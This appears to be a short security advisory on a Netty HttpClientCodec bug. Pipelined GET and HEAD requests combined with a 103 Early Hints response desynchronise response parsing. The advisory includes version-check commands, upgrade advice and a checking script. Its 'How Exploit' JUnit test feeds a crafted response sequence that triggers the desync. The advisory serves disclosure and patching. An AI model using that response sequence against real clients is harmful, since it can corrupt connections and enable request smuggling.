The vulnerability resides in Netty’s `HttpClientCodec`, which uses a `queue.poll()` mechanism to pair each inbound HTTP response with its corresponding outbound request. This pairing occurs for every response, including provisional `1xx` (Informational) status codes. The flaw is triggered when an HTTP/1.1 client pipelines a `GET` request immediately followed by a `HEAD` request. If the server sends a `103 Early Hints` response, followed by a `200 OK` containing a body for the `GET` request, and then a second `200 OK` for the `HEAD` request, the codec incorrectly pairs the `HEAD` request with the first `200 OK` response.

Because the `HEAD` method is defined to have no response body, the codec then skips reading the payload of the first `200 OK`. As a result, the body bytes from the `GET` request remain unconsumed in the TCP stream. The logic later attempts to parse the following `200 OK` for the `HEAD` request, but because the stream’s read pointer is now misaligned due to the leftover bytes, it parses the response from the wrong offset. This leads to a desynchronization of the request-response channel state, causing the codec to fail to correctly decode subsequent HTTP messages on the same connection, disrupting the integrity and availability of the HTTP parsing process.
DailyCVE form:
Platform: Netty
Version: 4.1.132.Final
Vulnerability: Response body misparsing
Severity: Medium
Date: 2026-05-07
Prediction: Patch already available
What Undercode Say:
```bash
# Check Netty version in your project (Maven)
mvn dependency:tree | grep netty-codec-http
# Check Netty version in your project (Gradle)
gradle dependencies | grep netty-codec-http
# Find netty-codec-http JAR files (the file name carries the version)
find . -name "netty-codec-http-*.jar"
# Verify the fix by checking for version >= 4.1.133.Final or >= 4.2.13.Final
```
How Exploit:
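```java
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultFullHttpRequest;
import io.netty.handler.codec.http.HttpClientCodec;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.util.CharsetUtil;
import org.junit.jupiter.api.Test;

public class HttpClientCodecPipeliningTest {
    @Test
    public void testPipelinedGetHeadAttack() {
        EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec());
        // Pipeline GET then HEAD
        channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/1"));
        channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, "/2"));
        // Send maliciously crafted response sequence: 103, 200 with body, 200
        String responseStr = "HTTP/1.1 103 Early Hints\r\n\r\n" +
                "HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello" +
                "HTTP/1.1 200 OK\r\n\r\n";
        channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII));
        // Subsequent responses are parsed incorrectly, leading to failure
    }
}
```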
Protection from this CVE:
Upgrade `io.netty:netty-codec-http` to version `4.1.133.Final` (stable) or `4.2.13.Final` (next stable). This update corrects the response-request pairing logic to handle pipelined `HEAD` and `GET` requests with `1xx` responses properly.
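A version check that applies the fixed-release thresholds above to `mvn dependency:tree` output and to JAR file names, as an added example (not code from Netty or from this advisory's source). The function names and the `needs-upgrade`/`unknown` labels are assumptions, as is treating every 4.1 or 4.2 release below the fixed one as needing the upgrade.

```sh
#!/bin/sh
# Added example (not from the advisory's source): classify netty-codec-http
# versions against the fixed releases the advisory names.
# Assumption: on the 4.1 and 4.2 lines, any release below the fixed one needs
# the upgrade; other release lines are reported as "unknown".

# netty_http_status VERSION -> prints fixed | needs-upgrade | unknown
netty_http_status() (
  IFS=. read -r major minor patch _rest <<EOF
${1%.Final}
EOF
  # A missing or non-numeric patch component cannot be compared.
  case "$patch" in ''|*[!0-9]*) major=invalid ;; esac
  case "$major.$minor" in
    4.1) if [ "$patch" -ge 133 ]; then echo fixed; else echo needs-upgrade; fi ;;
    4.2) if [ "$patch" -ge 13 ]; then echo fixed; else echo needs-upgrade; fi ;;
    *)   echo unknown ;;
  esac
)

# scan_dependency_tree: reads `mvn dependency:tree` output on stdin and prints
# "STATUS VERSION" per distinct netty-codec-http version (netty-codec-http2 is
# a different artifact and is not matched).
scan_dependency_tree() {
  sed -n 's/.*io\.netty:netty-codec-http:jar:\([^:]*\).*/\1/p' | sort -u |
  while IFS= read -r ver; do
    printf '%s %s\n' "$(netty_http_status "$ver")" "$ver"
  done
}

# scan_netty_jars DIR: prints "STATUS VERSION PATH" per JAR found under DIR.
scan_netty_jars() {
  find "$1" -type f -name 'netty-codec-http-*.jar' | sort |
  while IFS= read -r jar; do
    ver=${jar##*/netty-codec-http-}
    ver=${ver%.jar}
    printf '%s %s %s\n' "$(netty_http_status "$ver")" "$ver" "$jar"
  done
}

# Usage: sh check-netty.sh DIR  (with no argument only the functions are defined)
if [ "$#" -gt 0 ]; then scan_netty_jars "$1"; fi
```

Shaded or uber JARs bundle the codec without a matching file name, so an empty scan result does not prove the codec is absent.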
Impact:
The flaw compromises the integrity and availability of HTTP parsing on the affected connection, leading to unsafe reuse of the socket and potential request smuggling scenarios.
Sources:
Reported By: github.com

